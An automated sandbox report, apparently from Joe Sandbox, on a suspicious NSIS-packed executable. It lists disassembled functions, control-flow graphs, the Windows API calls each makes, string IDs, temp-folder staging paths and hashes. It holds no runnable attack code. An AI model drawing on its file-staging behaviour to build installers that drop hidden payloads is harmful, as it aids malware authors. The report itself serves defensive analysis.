405a16-405a1e call 4055aa 198->211 199->196 205 40589b-40589d 202->205 206 40589f-4058a0 call 406983 202->206 205->194 205->206 206->194 218 4059b0-4059b5 call 405f0b 210->218 219 4059ba-4059cb GetClassInfoA 210->219 216 405a20-405a26 211->216 217 405a3a-405a3c call 401533 211->217 216->199 220 405a28-405a2a call 401533 216->220 226 405a41 217->226 218->219 223 4059e3-405a14 DialogBoxParamA call 401533 call 403aeb 219->223 224 4059cd-4059e1 GetClassInfoA RegisterClassA 219->224 220->199 223->196 224->223 226->226
                                                  APIs
                                                    • Part of subcall function 004065A6: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,00403612,0000000C), ref: 004065B4
                                                    • Part of subcall function 004065A6: GetProcAddress.KERNEL32(00000000), ref: 004065D0
                                                  • lstrcatA.KERNEL32(1033,0079DE10,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079DE10,00000000,00000002,00000000,76763410,00000000,00000000), ref: 004057FA
                                                  • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\zamindari\Millenarian233,1033,0079DE10,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079DE10,00000000,00000002,00000000), ref: 00405871
                                                  • lstrcmpiA.KERNEL32(-000000FC,.exe), ref: 00405885
                                                  • GetFileAttributesA.KERNEL32(Call), ref: 00405890
                                                  • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\zamindari\Millenarian233), ref: 004058D9
                                                    • Part of subcall function 004062C9: wsprintfA.USER32 ref: 004062D6
                                                  • RegisterClassA.USER32(007A1FE0), ref: 0040591E
                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00405935
                                                  • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040596A
                                                  • ShowWindow.USER32(00000005,00000000), ref: 0040599C
                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,007A1FE0), ref: 004059C7
                                                  • GetClassInfoA.USER32(00000000,RichEdit,007A1FE0), ref: 004059D4
                                                  • RegisterClassA.USER32(007A1FE0), ref: 004059E1
                                                  • DialogBoxParamA.USER32(?,00000000,00404D44,00000000), ref: 004059FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\zamindari\Millenarian233$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                  • API String ID: 1975747703-3726699395
                                                  • Opcode ID: b34e74a3717f405d88fcbed0c523b0e5fcefc98d97dcd6040f69d7bf902df438
                                                  • Instruction ID: bd36d7e70897bbf2181797afd4624f26b8f643aede01ee3bbb66e1295e43baea
                                                  • Opcode Fuzzy Hash: b34e74a3717f405d88fcbed0c523b0e5fcefc98d97dcd6040f69d7bf902df438
                                                  • Instruction Fuzzy Hash: 8961C471201601BEE610AB69AD42F2B3A5CEB45758F00813EF941B62D2DB7D9C128E6D
                                                  Function 0040154A Relevance: 37.2, APIs: 17, Strings: 4, Instructions: 431stringtimesleepCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 231 40154a-4015a6 232 402cfc 231->232 233 4015ac 231->233 253 402d00 232->253 234 4018a3-4018ac call 402e92 call 406712 233->234 235 401624-40162a 233->235 236 4016a6-4016b3 233->236 237 401669-40168f 233->237 238 4015cb-4015d3 233->238 239 40180c-401829 call 402e92 GetFullPathNameA 233->239 240 4017b0-4017d3 call 402e92 * 3 MoveFileA 233->240 241 4015f1-4015f2 233->241 242 4015b3-4015b5 233->242 243 4016d3-4016df call 402e92 SetFileAttributesA 233->243 244 401694-4016a1 call 4062c9 233->244 245 4016f5-401708 call 402e92 call 406876 233->245 246 401875-401892 call 402e92 SearchPathA 233->246 247 4018b6-4018d8 call 402e92 call 406a5f 233->247 248 401618-40161f SetForegroundWindow 233->248 249 4015ba-4015bb 233->249 250 4015fd-401613 call 402e56 Sleep 233->250 251 4015de-4015e7 call 402f0c call 401399 233->251 252 40179f-401e5c call 402e92 call 40627e 233->252 308 4018b1 234->308 265 401656-401664 235->265 266 40162c 235->266 271 4016b5-4016b9 ShowWindow 236->271 272 4016bd-4016c4 236->272 269 402d08-402d12 237->269 254 4015c1-4015c6 238->254 255 4015d5-4015dc PostQuitMessage 238->255 301 401836-40183c 239->301 302 40182b-401834 239->302 332 4017e1-4017e5 240->332 333 4017d5-4017dc 240->333 262 4015f3-4015f8 call 405a65 241->262 242->269 291 4016e5-4016e7 243->291 244->232 316 401762-40176b 245->316 317 40170a-40171e call 4062a5 245->317 246->232 295 401898-40189e 246->295 319 4018e2-4018f4 call 4067cb call 406207 lstrcatA 247->319 320 4018da-4018e0 call 4067cb 247->320 248->232 273 4015bc call 405a65 249->273 250->232 305 4015ec 251->305 324 401e62-401e66 252->324 325 401b7c-401b80 252->325 267 402d06 253->267 254->269 255->254 262->232 265->232 284 40163c-401651 call 402e56 266->284 285 40162e-401635 266->285 267->269 271->272 272->232 288 4016ca-4016ce ShowWindow 272->288 273->254 284->232 285->284 288->232 291->232 303 4016ed-4016f0 291->303 295->253 312 401859 301->312 313 40183e-401840 301->313 311 40185d-401861 302->311 303->253 305->269 308->291 311->253 314 401867-401870 GetShortPathNameA 311->314 312->311 313->312 321 401842-40184a call 40627e 313->321 314->232 328 401798-40179a 316->328 329 40176d-40178c call 405a65 call 4067cb SetCurrentDirectoryA 316->329 338 401720-401724 317->338 339 401737-401738 call 405b8d 317->339 341 4018f9-401901 call 4069ae 319->341 320->341 321->302 344 40184c-401854 call 4067cb 321->344 324->269 325->269 328->262 329->253 362 401792-401793 329->362 332->303 340 4017eb-4017f3 call 40627e 332->340 333->262 338->339 345 401726-40172d call 4061ad 338->345 354 40173d-40173f 339->354 340->303 358 4017f9-401807 call 405fa6 340->358 361 401902-401905 341->361 344->312 345->339 363 40172f-401735 call 405bad 345->363 359 401741-401746 354->359 360 401757-401760 354->360 358->262 365 401753 359->365 366 401748-401751 GetFileAttributesA 359->366 360->316 360->317 367 401934-401936 361->367 368 401907-401911 call 40627e 361->368 362->253 363->354 365->360 366->360 366->365 369 401938-401939 call 40684e 367->369 370 40193e-401959 call 4065db 367->370 379 401913-401922 CompareFileTime 368->379 380 401924-401933 368->380 369->370 381 4019e6-401a17 call 405a65 call 402f57 370->381 382 40195f-401961 370->382 379->380 380->367 395 401a20-401a28 SetFileTime 381->395 396 401a19-401a1e 381->396 383 401963-4019af call 4067cb * 2 call 405c08 call 4067cb call 406759 382->383 384 4019cd-4019e1 call 405a65 382->384 383->361 413 4019b5-4019b8 383->413 384->253 397 401a2e-401a3b CloseHandle 395->397 396->395 396->397 397->232 399 401a41-401a44 397->399 401 401a46-401a55 call 405c08 lstrcatA 399->401 402 401a57-401a5a call 405c08 399->402 408 401a5f-401a6a call 406759 401->408 402->408 408->254 414 4019c2-4019c8 413->414 415 4019ba-4019bd 413->415 414->267 415->273
                                                  APIs
                                                  • PostQuitMessage.USER32(?), ref: 004015D6
                                                  • Sleep.KERNELBASE(00000001,?,?,?,?), ref: 0040160D
                                                  • SetForegroundWindow.USER32 ref: 00401619
                                                  • ShowWindow.USER32(00000000), ref: 004016B7
                                                  • ShowWindow.USER32(00000000,?), ref: 004016CC
                                                  • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004016DF
                                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401749
                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\zamindari\Millenarian233\Heteromastigote,00000000,000000E6,C:\Users\user\AppData\Local\Temp\nsb9D0E.tmp\System.dll,00000000,000000F0), ref: 00401780
                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 004017CB
                                                  • GetFullPathNameA.KERNEL32(00000000,00000400,00000000,?,?,000000E3,C:\Users\user\AppData\Local\Temp\nsb9D0E.tmp\System.dll), ref: 00401821
                                                  • GetShortPathNameA.KERNEL32(00000000,00000000,00000400), ref: 0040186A
                                                  • SearchPathA.KERNELBASE(?,00000000,?,00000400,00000400,?,000000FF), ref: 0040188A
                                                  • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\zamindari\Millenarian233\Heteromastigote,00000000,00000000,00000031,00000400,00000000,000000EF), ref: 004018F4
                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\zamindari\Millenarian233\Heteromastigote,00000000,00000000,00000031,00000400,00000000,000000EF), ref: 0040191C
                                                  • SetFileTime.KERNELBASE(?,?,?,?,?,?,?,?,000000EA,?,Call,40000000,00000001,Call,00000000,00000000), ref: 00401A28
                                                  • CloseHandle.KERNELBASE(?), ref: 00401A2F
                                                  • lstrcatA.KERNEL32(Call,?,Call,000000E9), ref: 00401A50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsb9D0E.tmp$C:\Users\user\AppData\Local\Temp\nsb9D0E.tmp\System.dll$C:\Users\user\AppData\Local\Temp\zamindari\Millenarian233\Heteromastigote$Call
                                                  • API String ID: 3895412863-2700707144
                                                  • Opcode ID: f5032595807d89ee03b5a0f2c3b4dec7693195a26f55033cae5449e9b72bb4f5
                                                  • Instruction ID: d0efa7ec6b141a31571b4db4a31c9dcfdf6ce7e4ad1a34ff31dbfffd4bbbf335
                                                  • Opcode Fuzzy Hash: f5032595807d89ee03b5a0f2c3b4dec7693195a26f55033cae5449e9b72bb4f5
                                                  • Instruction Fuzzy Hash: FAD1E970108305ABD710BB259D85E2F36A8AF86754F14463FF852F22E2D77CDD02966E
                                                  Function 004031C2 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 178memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 638 4031c2-40320f GetTickCount GetModuleFileNameA call 4065db 641 403211-403216 638->641 642 40321b-40324b call 4067cb call 406983 call 4067cb GetFileSize 638->642 644 40341a-403421 641->644 650 403251 642->650 651 403347-403356 call 40315e 642->651 653 403255-40327b call 402f2a 650->653 656 403415 651->656 657 40335c-40335e 651->657 661 403281-403288 653->661 662 40340d-403414 call 40315e 653->662 656->644 659 403360-403378 call 402f40 call 406608 657->659 660 40338f-4033bf GlobalAlloc call 402f40 call 402f57 657->660 680 40337d-40337f 659->680 660->656 688 4033c1-4033d3 660->688 666 403309-40330c 661->666 667 40328a-4032a3 call 406359 661->667 662->656 669 403316-40331c 666->669 670 40330e-403315 call 40315e 666->670 667->669 684 4032a5-4032ad 667->684 676 403331-403339 669->676 677 40331e-40332d call 406a8b 669->677 670->669 676->653 685 40333f-403343 676->685 677->676 680->656 686 403385-403389 680->686 684->669 689 4032af-4032b7 684->689 685->651 686->656 686->660 690 4033d5 688->690 691 4033db-4033de 688->691 689->669 692 4032b9-4032c1 689->692 690->691 694 4033e1-4033e9 691->694 692->669 693 4032c3-4032cb 692->693 693->669 695 4032cd-4032ec 693->695 694->694 696 4033eb-403404 SetFilePointer call 406359 694->696 695->656 697 4032f2-4032f8 695->697 700 403409-40340b 696->700 697->685 699 4032fa-403303 697->699 699->669 701 403305-403307 699->701 700->644 701->669
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 004031D5
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\x.exe,00000400,?,?,?,?,?), ref: 004031F1
                                                    • Part of subcall function 004065DB: GetFileAttributesA.KERNELBASE(00000003,00403204,C:\Users\user\AppData\Local\Temp\x.exe,80000000,00000003,?,?,?,?,?), ref: 004065DF
                                                    • Part of subcall function 004065DB: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 004065FF
                                                  • GetFileSize.KERNEL32(00000000,00000000,007AA000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\x.exe,C:\Users\user\AppData\Local\Temp\x.exe,80000000,00000003,?,?,?,?,?), ref: 0040323B
                                                  • GlobalAlloc.KERNELBASE(00000040,?,?,?,?,?,?), ref: 00403395
                                                  Strings
                                                  • Null, xrefs: 004032C3
                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004031C8
                                                  • C:\Users\user\AppData\Local\Temp, xrefs: 0040321C, 00403221, 00403227
                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403415
                                                  • soft, xrefs: 004032B9
                                                  • C:\Users\user\AppData\Local\Temp\x.exe, xrefs: 004031E0, 004031EA, 004031FE, 0040321B
                                                  • Error launching installer, xrefs: 00403211
                                                  • Inst, xrefs: 004032AF
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\x.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                  • API String ID: 2803837635-1114873025
                                                  • Opcode ID: 0a4738d2407356662d860e6581d6b63ab78cc4ef9c94914f0b925fbb8bc66526
                                                  • Instruction ID: edcd877254bf410c485efe5d65639ad847afc01bc56376090356b8a631eb95e7
                                                  • Opcode Fuzzy Hash: 0a4738d2407356662d860e6581d6b63ab78cc4ef9c94914f0b925fbb8bc66526
                                                  • Instruction Fuzzy Hash: 2A512431504300AFD720AF65DD81B6B7AA8EB85715F00053EF955B72E2CB7C8E458BAE
                                                  Function 00405C08 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 222stringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 702 405c08-405c11 703 405c13-405c22 702->703 704 405c24-405c3b 702->704 703->704 705 405c50-405c53 704->705 706 405c3d-405c46 704->706 708 405e73-405e78 705->708 709 405c59-405c5a 705->709 706->705 707 405c48-405c4c 706->707 707->705 710 405e83 708->710 711 405e7a-405e81 call 4067cb 708->711 712 405c5b-405c6a 709->712 714 405e85-405e8a 710->714 711->714 715 405c70-405c75 712->715 716 405e6d-405e72 712->716 718 405e49 715->718 719 405c7b-405cb7 715->719 716->708 722 405e56-405e5b 718->722 723 405e4b-405e51 718->723 720 405df5-405df8 719->720 721 405cbd-405cc4 719->721 726 405dfa-405dfd 720->726 727 405e2e-405e31 720->727 724 405ce2-405ce4 721->724 725 405cc6-405cd2 721->725 729 405e5c-405e67 722->729 728 405e53-405e54 723->728 733 405ce5-405cfb 724->733 725->724 732 405cd4-405cd7 725->732 734 405e0d-405e24 call 4067cb 726->734 735 405dff-405e0b call 4062c9 726->735 730 405e33-405e37 call 405c08 727->730 731 405e3c-405e47 lstrlenA 727->731 728->729 729->712 729->716 730->731 731->728 732->724 738 405cd9-405cdc 732->738 739 405d32-405d35 733->739 740 405cfd-405d18 call 406637 733->740 734->731 748 405e26-405e2c call 4069ae 734->748 735->731 738->724 745 405cde-405ce0 738->745 743 405d37-405d43 GetSystemDirectoryA 739->743 744 405d48-405d4b 739->744 752 405d1d-405d20 740->752 749 405dd3-405dd6 743->749 750 405d5b-405d77 744->750 751 405d4d-405d59 GetWindowsDirectoryA 744->751 745->733 748->731 754 405dd8-405ddb 749->754 756 405de9-405df3 call 4069ae 749->756 757 405d79-405d7b 750->757 758 405d8f-405da1 call 4065a6 750->758 751->749 753 405d26-405d2d call 405c08 752->753 752->754 753->749 754->756 761 405ddd-405de3 lstrcatA 754->761 756->731 757->758 763 405d7d-405d83 757->763 769 405da9-405dad 758->769 761->756 768 405d8b-405d8d 763->768 768->758 770 405dcf 768->770 771 405dc4-405dcd 769->771 772 405daf-405dc2 SHGetPathFromIDListA CoTaskMemFree 769->772 770->749 771->750 771->770 772->770 772->771
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405D3D
                                                    • Part of subcall function 004067CB: lstrcpynA.KERNEL32(?,?,00000400,00403673,Yangtze Setup,NSIS Error), ref: 004067D8
                                                    • Part of subcall function 004069AE: CharNextA.USER32(?,*?|<>/":,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403AA4,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 00406A15
                                                    • Part of subcall function 004069AE: CharNextA.USER32(?,?,?,00000000,?,00403AA4,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 00406A22
                                                    • Part of subcall function 004069AE: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403AA4,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 00406A27
                                                    • Part of subcall function 004069AE: CharPrevA.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403AA4,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 00406A3E
                                                  • GetWindowsDirectoryA.KERNEL32(Call,00000400,00000000,0079F640,00000006,00000000,?,00405A98,0079F640,?,?,?,?), ref: 00405D53
                                                  • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,00405A98,0079F640,?,?,?,?), ref: 00405DE3
                                                  • lstrlenA.KERNEL32(Call,00000000,0079F640,00000006,00000000,?,00405A98,0079F640,?,?,?,?), ref: 00405E3D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Directory$PrevSystemWindowslstrcatlstrcpynlstrlen
                                                  • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 4187626192-1230650788
                                                  • Opcode ID: 15b5890fcd4d0f7667189a590263b7b370dc9dd83dfd5202be9ed00fab044e94
                                                  • Instruction ID: 5cf065baaa7b599859496c34c8425ef1c131a70744efe5cae7427bea07149fab
                                                  • Opcode Fuzzy Hash: 15b5890fcd4d0f7667189a590263b7b370dc9dd83dfd5202be9ed00fab044e94
                                                  • Instruction Fuzzy Hash: E1610770608B015BE714AB28CD84B3B7BA5EF96704F24843FF585B62D1D63C8D468B5E
                                                  Function 00402F57 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 162COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 842 402f57-402f84 843 402f93-402fa7 call 406608 842->843 844 402f86-402f8e call 402f40 842->844 848 403151 843->848 849 402fad-402fb3 843->849 844->843 850 403153 848->850 851 4030f9-4030fb 849->851 852 402fb9-402fe3 GetTickCount 849->852 853 403154-40315b 850->853 854 40313d-40314f call 402f2a 851->854 855 4030fd-4030ff 851->855 856 4030f1-4030f3 852->856 857 402fe9-403000 call 402f2a 852->857 854->848 854->856 855->856 859 403101 855->859 856->853 857->848 864 403006-403014 857->864 862 403106-403116 call 402f2a 859->862 862->848 869 403118-403125 call 4066c7 862->869 866 40301e-40303a call 406af7 864->866 872 403040-403060 GetTickCount 866->872 873 4030f5-4030f7 866->873 877 403127-403135 869->877 878 403139-40313b 869->878 875 403062-40306b 872->875 876 4030ad-4030b3 872->876 873->850 880 403071-4030a9 MulDiv wsprintfA call 405a65 875->880 881 40306d-40306f 875->881 882 4030b5-4030b7 876->882 883 4030e9-4030eb 876->883 877->862 879 403137 877->879 878->850 879->856 880->876 881->876 881->880 885 4030b9-4030bf call 4066c7 882->885 886 4030ce-4030d6 882->886 883->856 883->857 891 4030c4-4030c6 885->891 887 4030da-4030e1 886->887 887->866 890 4030e7 887->890 890->856 891->878 892 4030c8-4030cc 891->892 892->887
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402FB9
                                                  • GetTickCount.KERNEL32 ref: 0040304B
                                                  • MulDiv.KERNEL32(?,00000064,?), ref: 0040307B
                                                  • wsprintfA.USER32 ref: 0040308C
                                                    • Part of subcall function 00402F40: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004033AC,00048BE4,?,?,?,?,?), ref: 00402F4E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.136006257107.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006330846.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.000000000077B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000780000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000784000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.0000000000787000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007A8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007BF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136006368776.00000000007C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000002.00000002.136007240936.00000000007C5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
